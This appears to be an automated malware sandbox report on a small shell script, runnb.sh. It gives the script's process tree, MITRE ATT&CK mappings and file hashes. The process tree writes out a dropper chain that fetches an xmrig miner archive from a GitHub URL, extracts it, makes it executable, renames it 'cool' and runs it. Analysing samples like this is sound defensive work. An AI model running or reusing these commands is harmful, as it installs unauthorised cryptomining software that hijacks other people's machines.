a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Analysis

max time kernel
81s
max time network
85s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
30-10-2024 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
796	chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

Processes:

sudo

pid	Process
708	sudo

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

Processes:

exim4exim4

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

taraptsudosendmailsendmailaptdpkgdpkgdpkgmvdpkg

description	ioc	Process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

Processes:

aptapt

description	ioc	Process
File opened for modification	/tmp/fileutl.message.H4Gfyx	apt
File opened for modification	/tmp/fileutl.message.eDgAe6	apt
File opened for modification	/tmp/fileutl.message.fx7zYX	apt
File opened for modification	/tmp/fileutl.message.4ICgvV	apt
File opened for modification	/tmp/fileutl.message.9h1I9x	apt
File opened for modification	/tmp/fileutl.message.f9ge2N	apt
File opened for modification	/tmp/fileutl.message.nTy4DM	apt
File opened for modification	/tmp/fileutl.message.2dZTXP	apt

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:703
- /usr/bin/sudo
  sudo apt install wget
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:708
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:765
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1t67gv-0000CL-Lq
      4⤵
      Reads CPU attributes
      PID:777
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:768
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1t67h1-0000CO-9S
      4⤵
      Reads CPU attributes
      PID:785
- - /usr/bin/apt
    apt install wget
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:770
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:775
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:781
- /usr/bin/apt
  apt install wget
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:791
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:792
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:793
- /usr/bin/wget
  wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  2⤵
  PID:794
- /bin/tar
  tar xvf xmrigtar.tar.gz
  2⤵
  - Reads runtime system information
  PID:795
- /bin/chmod
  chmod +x xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /bin/mv
  mv xmrig cool
  2⤵
  - Reads runtime system information
  PID:797
- /tmp/cool
  ./cool
  2⤵
  PID:798

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
843B

MD5
c119290b4b236726c354767c78d50f6f

SHA1
1044b0fe3b8976c17e00af7644652622b832564e

SHA256
e9035976b29be5543851586e63733a405ce474dd3878034775a70558bfce9fa9

SHA512
fb0b1f27006f0370f955153e72ff7fc3f9b42e8c90de2a91d400cd165d3686efdf338d40ebf1de01e345ba720250993978da1e31f4b1fc3e1b444ce3d5c4aebc

Download Submit
/var/mail/user

Filesize
1KB

MD5
1a9357c61184b6fcde7ec8adf62c1934

SHA1
3cb31b5ac7fa08cbdd4a1849bdc6e724b7c8a061

SHA256
3a26fc46bfdf3222cc9f5ce26e7a6973906ae087fff0525024a798dfb60d0c1a

SHA512
d83107007e5c46c4aa9836c25864f581b4b05bf327cae8fbbcb6035bfa4c142ceac2d528e3195ad6890a65ec8ff79650146ccf4627e126752197fd52d497efaa

Download Submit
/var/spool/exim4/input/1t67gv-0000CL-Lq-D

Filesize
128B

MD5
f59e2e48ff25ea931ae1e1b9bb64bb0b

SHA1
58c02417b3866f3815d8579515c402f78a3a302e

SHA256
a905d792e38b83e580049f063422ef22bc41c5c0569a6a834783f6ff232402af

SHA512
ad379fa80e1e5a69713907e089939798f31b0be51f29bb2cac2281e918881a776b1ac7c779c60420c6942bc96c9a41aac4e76cac1f41201c029a3645123b3ced

Download Submit
/var/spool/exim4/input/1t67h1-0000CO-9S-D

Filesize
146B

MD5
e46e8e7aac7b60d12a1e64db7889b728

SHA1
0b7b146848df83518a02746eb227087d9d2dd458

SHA256
6d497bfadc49b25596e1b3fed278a47204fafe5b10772c7ab2be74773d0bf4f9

SHA512
bd088cc196f554b2944199d814d0672683505836b0935f7a2114944933ec2517f80f851d1b4375111c310c94646f1b8709b6b58fc7748b98bcdb79ef7385e4b7

Download Submit
/var/spool/exim4/input/1t67h1-0000CO-9S-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.765

Filesize
915B

MD5
235cf1675249188ded274b29e8ee5063

SHA1
39bbaabb3b6e97a5700755b4df86cad2f03c3935

SHA256
ddaa0062fd77a6c43cf48779f2fcfea71ce510591407ca8f13d9e960f66deabe

SHA512
952f892cf7ecd0cd6f9e2dbdcbe705ebe9207b16b5a2fa825e26cf53980c3d64110735d79ac75320a0bda3170519bff5eb4e281d4c3a0ddeb2fba8a3f3820ebe

Download Submit
/var/spool/exim4/input/hdr.768

Filesize
915B

MD5
393ad72a73af4f4224ee4684e84c1f03

SHA1
8fa2949089af87d68b8c505cb73a4f96e8b01381

SHA256
99b9d1082fed837e02567889151571e0796d9d5a4edbaac9836d4fd43ca02eb9

SHA512
45f55f9646baa12c24c5e8011d364a80955916a4a53294e3446f5ee726c4c4bf384a0fb19656cf108316b0590ccc08310a58f004b00a1ec1c880b52e8c434db0

Download Submit
/var/spool/exim4/msglog/1t67gv-0000CL-Lq

Filesize
288B

MD5
da2a87030770039451eb8b19efb0dd03

SHA1
29dcfc86c30936a6580301db06f8950a4bf82fba

SHA256
a61fd28737c72637172af504c9bdc03ab21a8b2bf8fb60411a0d74865897a112

SHA512
13ba1f346a60b3be398affa17d19aba6ec47e47be217ca4571bc22b237c07f4c1132c36dbe95b6df972e47ce01e11515c9f54f686a70db7af07b8dd2d19f84f2

Download Submit
/var/spool/exim4/msglog/1t67gv-0000CL-Lq

Filesize
89B

MD5
5d4bb00dbb11f22357bda8b1fb9c1871

SHA1
997a7f7cdf96aafb1dbc87cc501a496164b82450

SHA256
17595a351cfc4f074ac17cd2dacafb77b5898d43b1126dc89d60252b25cbff5b

SHA512
44d36d47920755142fa8e00585ce086c7262e24bbff20a3f6c8dd37eda4b66dfc20e53631c0dd5f80270ab5251ece107f8b5b3a7266612508b9fde3d4ae52c4f

Download Submit
/var/spool/exim4/msglog/1t67h1-0000CO-9S

Filesize
288B

MD5
8255b0788ad95e85f02b34a07769d73f

SHA1
d30fef5e3683d5969fef337a81cbea9be2f3efb1

SHA256
65cecc2c82e801a87b18bb866453701f9040eea9a65b04c2d1dbffeed378a29e

SHA512
92a33961e56b7d5224320ec247066436f2f35ac69958393360786d2e49b64c4e0455957a3ef4fb7309ad57006dd0501355aea43fb7b164fd716ec3cabea19108

Download Submit
/var/spool/exim4/msglog/1t67h1-0000CO-9S

Filesize
89B

MD5
55853851870c39a656c4c7dedf052da9

SHA1
5fd081b691a200c62e2d0b2501f64cb1d6aa6f7a

SHA256
3123a4e168aff9171ce08d77434a097bf88559bde8095a6883e95c46d7feb75b

SHA512
a7c50c4714cc4317341d02524ab806bf59c426eee7b1290d366c9ad15e378232d82a08fa1d83ee2581b77fd18677e7a49cab8a5a9f42c8c497d8527764ab1323

Download Submit